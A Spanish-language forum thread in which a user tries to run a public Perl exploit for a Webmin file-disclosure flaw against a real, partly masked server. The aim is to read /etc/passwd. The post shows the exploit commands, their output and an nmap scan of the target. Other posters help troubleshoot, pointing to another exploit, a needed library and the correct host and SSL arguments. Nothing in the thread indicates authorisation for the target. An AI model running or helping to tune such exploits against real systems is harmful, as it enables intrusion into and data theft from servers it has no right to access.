hola, estoy probando un exploit para webmin que cuando lo ejecuto recibo el siguiente error.
[nube@GNU webmin]$ perl 2017.pl https://server.xxxxxxx.xxxx 10000 /etc/passwd 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking https://server.xxxxxxxxx.xxxx on port 10000!
FILENAME: /etc/passwd
Failed: 500 Can't connect to https::443 (Bad hostname 'https:')
nmap quick scan plus
Starting Nmap 5.21 ( http://nmap.org ) at 2010-07-06 00:10 ART
Nmap scan report for www.xxxxxxxxxxx.xxx (2**.45.xx.**)
Host is up (0.32s latency).
rDNS record for 2**.45.**: server.xxxxxxxxxx.xxxx
Not shown: 92 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
22/tcp closed ssh
53/tcp open domain ISC BIND 9.5.0-P1
80/tcp open http Apache httpd 2.2.8 ((Fedora))
110/tcp open pop3 Dovecot pop3d
143/tcp open imap Dovecot imapd
873/tcp closed rsync
10000/tcp open http MiniServ 0.01 (Webmin httpd)
Device type: general purpose|firewall|proxy server|WAP
Running (JUST GUESSING) : Linux 2.6.X|2.4.X (93%), ISS Linux 2.4.X (92%), Cisco Linux 2.6.X (88%), Riverbed embedded (88%), AVM embedded (87%), Netgear embedded (87%), Linksys embedded (87%)
Aggressive OS guesses: Blue Coat Director (Linux 2.6.10) (93%), Linux 2.6.18 (93%), Linux 2.6.5 (93%), Linux 2.6.9 - 2.6.27 (92%), ISS Proventia GX3002 firewall (Linux 2.4.18) (92%), Linux 2.6.9 (89%), Linux 2.4.20 (88%), Linux 2.6.18 - 2.6.28 (88%), Linux 2.6.24 (88%), Linux 2.6.29 (88%)
No exact OS matches for host (test conditions non-ideal).
Y no sé como demonios avanzar. :huh:
Ya instalé las librerías perl-crypt-ssleay y perl-net-ssleay y no sé que me puede estar faltando.
Desde ya agradezco cualquier ayuda.
Prueba este (http://www.securiteam.com/exploits/5GP0F00J5S.html) y que no se te olvide instalar php5-curl con linux desde los repositorios con:
sudo apt-get install php5-curl
He visto el code por encima y creo que no hay que modificar nada que asi funciona...
Saludos Søra
"Failed: 500 Can't connect to https::443 (Bad hostname 'https:')"
kamsky eso quiere decir que tiene que indicar el server sin el http:// ??? es que ahora mismo tengo la duda....
Saludos Søra
sep, si os dais cuenta, en la salida de nmap, indica que sólo está abierto el puerto 80 (http), pero no el 443(http+tls/ssl)
Tienes que ponerle la ip del hsot y no el dns.
Saludos
antes que nada gracias a todos.:)
Si ejecuto el exploit en base a la IP recibo un:
[nube@GNU webmin]$ perl 2017.pl 2**.4*.44.** 10000 /etc/passwd 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 2**.4*.44.** on port 10000!
FILENAME: /etc/passwd
Failed: 404 File not found
Por otro lado usaba la dirección completa porque es la cual desde donde se loguea el webmin. En mi caso:
https://server1.la****.***.ar:10000/
(http://omploader.org/vNHVweA/Pantallazo.jpg)
saludos
prueba a ver si admite http, ya que dudo que el exploit soporte https
[nube@GNU webmin]$ perl 2017.pl 2**.45.*.* 10000 /etc/passwd 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 2**.45.4*.** on port 10000!
FILENAME: /etc/passwd
FILE CONTENT STARTED
-----------------------------------
<h1>Error - Bad Request</h1>
<pre>This web server is running in SSL mode. Try the URL <a href='https://server1.l***.**.**:10000/'>https://server1.***.**.**:10000/</a> instead.<br></pre>
-------------------------------------
:huh: